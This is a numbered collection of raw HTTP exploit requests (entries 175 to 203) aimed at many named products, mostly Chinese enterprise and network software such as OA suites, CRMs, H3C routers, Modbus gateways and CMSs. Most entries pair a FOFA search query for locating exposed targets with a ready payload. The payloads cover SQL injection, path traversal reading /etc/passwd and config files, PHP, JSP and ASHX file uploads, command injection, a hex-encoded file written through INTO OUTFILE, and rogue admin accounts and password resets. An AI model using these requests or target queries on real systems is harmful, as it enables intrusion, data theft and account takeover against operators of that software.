GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"

------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申) Information Technology enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶) X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor (瑞友) Tianyi application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi (叁体) Jiahui video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. Esafenet (亿赛通) electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF value, then obtain a cookie, then upload and request the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92; path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--